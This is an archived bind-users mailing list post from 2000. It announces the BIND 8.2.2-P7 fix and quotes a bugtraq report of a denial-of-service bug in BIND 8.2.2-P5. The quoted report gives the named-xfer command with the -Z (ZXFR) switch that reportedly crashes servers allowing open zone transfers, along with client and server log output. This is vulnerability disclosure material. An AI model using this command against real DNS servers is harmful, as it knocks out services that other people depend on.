BIND-8.2.2-P7: RE: BIND 8.2.2-P5 Possible DOS

Mathias Körber mathias at koerber.org
Fri Nov 10 16:08:58 UTC 2000


A new bug-fix version (8.2.2-P7) has been available on www/ftp.isc.org
since earlier Thursday (PST).

> For those who doesn't want to read bugtraq or doesn't have time,=20
> here's the mail
> about the new DOS.
>=20
> I've tried it on OpenBSD 2.7 with bind 8.2.2p6 and it works pretty =
well...
>=20
> >
> >Hi,
> >playing with bind and ZXFR feature ( zone transfer compressed=20
> with a possible
> insecure
> >execlp("gzip", "gzip", NULL); ), i discovered a Denial Of=20
> Service against Bind
> 8.2.2-P5 .
> >
> >By default Bind 8.2.2-P5 it's not compiled with ZXFR support=20
> unless you define
> it with #define BIND_ZXFR
> >so it will refuse any ZXFR transfer, because it doesn't support it.
> >But now what appens? Look here...
> >
> >################################
> >zone to transfer: zone.pippo.com
> >dns server:       dns.pippo.com 192.168.1.1
> >me:               naif.gatesux.com 10.10.10.10
> >I send a Zone Trasnfer request using "-Z" switch with means that=20
> i wish to use
> ZXFR.
> >dns.pippo.com does'nt support ZXFR and have "allow-transfer{}"=20
> not configured,
> so everyone
> >could ask him for *.zone.pippo.com ...
> >
> ><naif at naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z=20
> zone.pippo.com
> -d 9 -f pics -Z dns.pippo.com
> >named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> >named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
> >
> >On the server's log:
> >Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from
> [10.10.10.10].2284 for "zone.pippo.com"
> >Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR=20
> (type ZXFR) of
> "zone.pippo.com" (IN) to [10.10.10.10].2284
> >
> >Then the server "*** CRASHED ***" .
> >
> >I should assume that bind 8.2.2-P5 it's vulnerable ( Please=20
> someone test and
> confirm this kind of dos)
> >and bind-9.0.0 has no support for ZXFR .
> >
> ><naif at naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr=20
> \{\}  ';' | wc
> -l
> >    234
> ><naif at naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i=20
> zxfr \{\}  ';' |
> wc -l
> >      0
> >
> >A lot of DNS Server are misconfigured, and allow zone-transfer=20
> to any, so they
> are dossable...
> >
> >
> >naif
> >naif at itapac.net
>=20
>=20
> ------------------------------------------------------------------
> -----------------------
>=20
>       Alec Barea
>       UNIX System Administrator / DNS specialist
>       SITA / EQUANT
>       alec.barea at sita.int
>       Tel:  +1 514 847-3436
>       Fax: +1 514 847-3400
>=20
>=20
>=20
>=20




More information about the bind-users mailing list